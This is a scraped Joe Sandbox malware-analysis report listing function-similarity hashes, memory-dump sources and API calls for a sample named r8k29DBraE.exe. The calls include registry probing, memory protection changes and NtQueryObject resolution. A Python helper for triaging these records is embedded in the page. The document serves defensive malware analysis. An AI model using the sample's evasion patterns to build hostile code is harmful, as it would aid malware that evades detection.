• Opcode ID: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
• Instruction ID: cb0c5075c893b5dd7e3d0210f51354234327389f8aeb8cdfcea730c70914034b
• Opcode Fuzzy Hash: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
• Instruction Fuzzy Hash: 2B11823D3017408AEF189B16F40D259666AF746B84F098425DE4D03B54EF3ED969C700

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: 133b7329f7c35a0d3b30a0080c0b2471880c4eb6935a293058c2dd16a093a5c7
• Instruction ID: fb73f922376a7326ac4d10486b12fd90b36b1e0cbd476e50f710b3bc3e85d364
• Opcode Fuzzy Hash: 133b7329f7c35a0d3b30a0080c0b2471880c4eb6935a293058c2dd16a093a5c7
• Instruction Fuzzy Hash: D8D1ED7A204B8886DB74CB0AE49835AB7A5F3C9B85F548112EACD477A5DF3DD960CB00

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 78c1719296444293cfe9d161745095a92cc6b1110c02aac1e2bc54111f1104d4
• Instruction ID: 04437a66b0cc7a1f3a2d795bc8755508a8b19a4b2c9b439dc878d9df1905c882
• Opcode Fuzzy Hash: 78c1719296444293cfe9d161745095a92cc6b1110c02aac1e2bc54111f1104d4
• Instruction Fuzzy Hash: DD020C36219BC48ADBA4CB59F49435AB7A5F3C5780F148015EA8E83BA9DF7DD864CF00

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: Virtual$AllocQuery
• String ID:
• API String ID: 31662377-0
• Opcode ID: 583c9a696cbd2eed1741be8d9dfd6b22d02d31c25e0c094f16caf77a54ebc047
• Instruction ID: 074052ddcf3e322968fe0f890455eba4881739eb596db4e34e47804b1cf84811
• Opcode Fuzzy Hash: 583c9a696cbd2eed1741be8d9dfd6b22d02d31c25e0c094f16caf77a54ebc047
• Instruction Fuzzy Hash: 28317535219AC4C9EB38DB14E05931FA7AEF389784F188525F5CD46BA9DF3ED9608B00

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0
• Opcode ID: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
• Instruction ID: 178e3c97e0c88a599720124179461fd81e95e4744776017db6c7a881b310848a
• Opcode Fuzzy Hash: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
• Instruction Fuzzy Hash: 2111A138710785CEF7689724E81E369229FA756705F4CC029984E85591EF3BEC79C610

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: CacheCurrentFlushInstructionProcessProtectVirtual
• String ID:
• API String ID: 3733156554-0
• Opcode ID: 8c4f484bea12a3d66523bbd423a72893e5e07743302c2e8b21c11c7b51894e53
• Instruction ID: 80a70d6d200a08a4e5f21bd9c99249f1bed1d0e22f7278694591139f554766e3
• Opcode Fuzzy Hash: 8c4f484bea12a3d66523bbd423a72893e5e07743302c2e8b21c11c7b51894e53
• Instruction Fuzzy Hash: E7F03A3A218B8485D674DB01F49874A6BA5F3C97D4F189112FA8D07B69CF3ADAA08B00

Control-flow Graph

APIs
  • Part of subcall function 000002616F591630: GetProcessHeap.KERNEL32 ref: 000002616F59163B
  • Part of subcall function 000002616F591630: HeapAlloc.KERNEL32 ref: 000002616F59164A
  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F5916BA
  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F5916E7
  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F591701
  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F591721
  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F59173C
  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F59175C
  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F591777
  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F591797
  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F5917B2
  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F5917D2
• Sleep.KERNEL32 ref: 000002616F591ADF
• SleepEx.KERNELBASE ref: 000002616F591AE5
  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F5917ED
  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F59180D
  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F591828
  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F591848
  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F591863
  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F591883
  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F59189E
  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F5918A8
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: CloseOpen$HeapSleep$AllocProcess
• String ID:
• API String ID: 1534210851-0
• Opcode ID: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
• Instruction ID: aaf17f2f4e785b11d8e5fdf7bd1c16a192e499f62de4bcd1b2a4e382aa0c64b0
• Opcode Fuzzy Hash: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
• Instruction Fuzzy Hash: D631217D3106A149FA589B23D55836923AFAB45BC4F1CD4218E0E876D6EF22EC718250

Control-flow Graph (interactive basic-block graph not reproduced; recoverable edge-list summary): function at 2616f302750; entry block 2616f302750-2616f3027b8 calls 2616f3029e8 four times; block 2616f3027d9-2616f3027fa calls VirtualAlloc; all paths converge on the exit block 2616f3029c8-2616f3029e4.
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction ID: 8dcda32693cec44d10b93e7bc14cdb444b14c52ce78ee02f9e407406ad529b9f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E61027AB01690CBDB54CF15D608B2DB39BFB44BA4F5C8126DE1907788DA39E872C701
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1600102747.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffaac560000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                • Opcode ID: ef78d05a1a386d499d6f0973f6eba25c3a10a4b4253765f99a22ecc7c6da5521
                                                                                                                                                                                                                                                • Instruction ID: ad26b0a7ef5ebc9a1a69fac44cbdea544a77c841b11f1489e845f52b9da6d8a2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef78d05a1a386d499d6f0973f6eba25c3a10a4b4253765f99a22ecc7c6da5521
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2531F63090CA4D8FDB59DB68C845BE9BBF0EB56321F04426FD04DC35A2DB646416CB91
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                                                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                                                                                • API String ID: 2119608203-3850299575
                                                                                                                                                                                                                                                • Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction ID: 056892e84e4a12242d0f5ab80578cd90d79c088ab9e88410561f2c66772193c9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8B1D23A2107D08AEB5DCF26D4487A963AEFB46B84F1C901ADE0953B94DF36EC65C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction ID: 15d017ccf61f7e346f9080347f19ca6b8822780c519427b1c971fa1776b54a9d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5831657A304B808AEB64DF64E8447ED7369F785744F48802ADB4E47B98DF39DA68C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction ID: 670c1ce31eea1e87310ed20d3bd7bcaf6a87406a30462cbd5bd646537ef9097d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C31B43A214F808ADB24CF24E8443EE73A9F78A794F544116EE9D43B59DF39C965CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction ID: 310d726cad5d3585bf1d3cf655f94a01babb62eaa47949ee68aac46df03e5dd7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7115E36710F058AEB40CF64E8583A837A8F319758F080E21DE6D427A4DF38D5B88340
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                                                                                • API String ID: 0-3850299575
                                                                                                                                                                                                                                                • Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction ID: 44cbf86cdc0ddbb44743e8f5efb7c152779ff0e7835dd09ecf58b37d28ca2a1f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60B1047A2106918AFB98CF65D6487A973AEFB44B84F4C5017EE0993794DF36ECA0C341
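The records above repeat the same Opcode ID (26544e6c…) at two different dump offsets (000002616F590000 and 000002616F300000) with different Instruction IDs, and two of the other records share the SetUnhandledExceptionFilter/IsDebuggerPresent/RtlCaptureContext/RtlVirtualUnwind token set. The following Python is an added triage helper, not Joe Sandbox code and not part of the report: it parses these "Similarity" records as they appear in the page text, groups them by Opcode ID so the same function seen at several addresses is counted once, and applies heuristics that are the example's own. The mapping of that exception-filter token set to the MSVC x64 CRT fast-fail handler (compiler runtime rather than malware logic) is an assumption of this example, as is the choice to flag records that resolve NtQueryObject from ntdll.dll alongside the object-name string \Device\Nsi. The sample input is an excerpt copied from the records on this page, including the "Download File" link residue the page carries.

```python
"""Triage helper for Joe Sandbox 'IDA Plugin' function records (added example)."""
import re
from collections import defaultdict

# Constructed sample: three records copied from the report text above.
SAMPLE = """
APIs
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\\Device\\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
• Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
• Instruction ID: 056892e84e4a12242d0f5ab80578cd90d79c088ab9e88410561f2c66772193c9
APIs
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
• Instruction ID: 15d017ccf61f7e346f9080347f19ca6b8822780c519427b1c971fa1776b54a9d
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
Similarity
• API ID:
• String ID: NtQueryObject$\\Device\\Nsi$ntdll.dll
• API String ID: 0-3850299575
• Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
• Instruction ID: 44cbf86cdc0ddbb44743e8f5efb7c152779ff0e7835dd09ecf58b37d28ca2a1f
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
OFFSET_RE = re.compile(r"Offset: ([0-9A-Fa-f]+)")
# Joe Sandbox API IDs are word tokens of the imported API names run together;
# '$' separates frequency tiers. Split CamelCase plus lowercase/underscore names.
TOKEN_RE = re.compile(r"_[a-z]+|[A-Z][a-z0-9]*|[a-z0-9]+")

# Assumption of this example: this token set (SetUnhandledExceptionFilter,
# UnhandledExceptionFilter, IsDebuggerPresent, RtlCaptureContext,
# RtlLookupFunctionEntry, RtlVirtualUnwind) is the MSVC x64 CRT fast-fail
# handler, i.e. compiler runtime code rather than the sample's own logic.
CRT_FASTFAIL = {"Exception", "Filter", "Unhandled", "Capture", "Context",
                "Debugger", "Present", "Entry", "Function", "Lookup",
                "Unwind", "Virtual"}


def tokens(api_id):
    """Set of word tokens in an API ID, ignoring the '$' tier separators."""
    return set(TOKEN_RE.findall(api_id.replace("$", " ")))


def parse_records(text):
    """Parse '• Key: Value' records; each 'Memory Dump Source' line starts a record."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
            records.append(cur)
            continue
        m = FIELD_RE.match(line)
        if cur is None or not m:
            continue
        key, val = m.group(1).strip(), m.group(2).strip()
        if key == "Associated":
            val = val.removesuffix("Download File")   # strip web-page link residue
        if key == "Source File":
            om = OFFSET_RE.search(val)
            if om:
                cur["Offset"] = om.group(1)
        cur[key] = val
    return records


def triage(rec):
    """Heuristic tags for one record (the heuristics are this example's own)."""
    toks = tokens(rec.get("API ID", ""))
    strings = set(rec.get("String ID", "").split("$")) - {""}
    tags = set()
    if CRT_FASTFAIL <= toks:
        tags.add("crt-fastfail")            # likely compiler runtime, deprioritise
    if {"NtQueryObject", "ntdll.dll"} <= strings and {"Proc", "Address"} <= toks:
        tags.add("dynamic-NtQueryObject")   # native API resolved by name at runtime
    if "\\Device\\Nsi" in strings:
        tags.add("nsi-device-name")         # object-name string for the NSI device
    if {"Alloc", "Virtual"} <= toks:
        tags.add("virtual-alloc")
    return tags


def summarize(text):
    """Group records by Opcode ID: offsets where the code was seen plus merged tags."""
    out = defaultdict(lambda: {"offsets": [], "tags": set()})
    for rec in parse_records(text):
        g = out[rec["Opcode ID"]]
        g["offsets"].append(rec.get("Offset", "?"))
        g["tags"] |= triage(rec)
    return dict(out)


if __name__ == "__main__":
    for opcode_id, g in summarize(SAMPLE).items():
        print(opcode_id[:12], g["offsets"], sorted(g["tags"]))
```

Grouping by Opcode ID rather than Instruction ID is deliberate: the Opcode ID is address-independent, so the same routine mapped at two dump offsets collapses into one line of triage output, while the Instruction ID (and fuzzy hashes) still differ and tell you it was relocated.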
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 15204871-0
                                                                                                                                                                                                                                                • Opcode ID: a5f266c12a220961406dde8eee325c1bf83c1065a404d0d9410b684e73e4a061
                                                                                                                                                                                                                                                • Instruction ID: 0c643126ef90a50c0fbea1f888c1e9cfba54b1da6a39323953eed5580286a35d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5f266c12a220961406dde8eee325c1bf83c1065a404d0d9410b684e73e4a061
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82B11977200B888EEB15CF69C88A3587BA5F384B48F19C916DE5D877B5CB3AD865C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _clrfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3618594692-0
                                                                                                                                                                                                                                                • Opcode ID: a5f266c12a220961406dde8eee325c1bf83c1065a404d0d9410b684e73e4a061
                                                                                                                                                                                                                                                • Instruction ID: 343dd5d2dd543ea25d4432f443ed1ef84fb97e5bf9ac6dd0a3141e126250b7c2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5f266c12a220961406dde8eee325c1bf83c1065a404d0d9410b684e73e4a061
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22B13B77200B888FEB15CF2AC88A3587BB5F384B49F198915DB5D877A4CB3AD461C701
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e270e8593a71ad66ef089fadfa74d4cb038ffb7aa402265e75b4220792d44019
                                                                                                                                                                                                                                                • Instruction ID: f45e88764e900034d2a2ee5898fa90e80993220f958839af29c79cd3f696bff8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e270e8593a71ad66ef089fadfa74d4cb038ffb7aa402265e75b4220792d44019
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8651D5367007D08AFB249B72E94879E7BAAF7457D4F188114EE5827B99DB39D821C700
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\r8k29DBraE.exe
                                                                                                                                                                                                                                                • API String ID: 0-2002025803
                                                                                                                                                                                                                                                • Opcode ID: f6aacf51cb33b707cb24cd9af6edfcd30ca69ce813e0594cda8c625fc8c82466
                                                                                                                                                                                                                                                • Instruction ID: ceaf2ceaa79762217117b7e58b6695b83b800717c22ee00206f55368735bae83
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6aacf51cb33b707cb24cd9af6edfcd30ca69ce813e0594cda8c625fc8c82466
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA31DEFF54DBC40EF3938A7CC87A25A2FDAA793E00F4ED056DA8006187E5572C3A8641
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                                • Opcode ID: 24f512c07acdf0e634261ab2d45bfa525d446d731f5c54d71af1c68651d24f8d
                                                                                                                                                                                                                                                • Instruction ID: abdb34cb354ff96d8d4250f7692f5dc49dffca064a0cdb60cfe1eaff2b17b0cf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24f512c07acdf0e634261ab2d45bfa525d446d731f5c54d71af1c68651d24f8d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DB0923CA13B09CAEA0A2B15EC8A30422AABB48701F998018840C41320DA2D28BA5B10
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e270e8593a71ad66ef089fadfa74d4cb038ffb7aa402265e75b4220792d44019
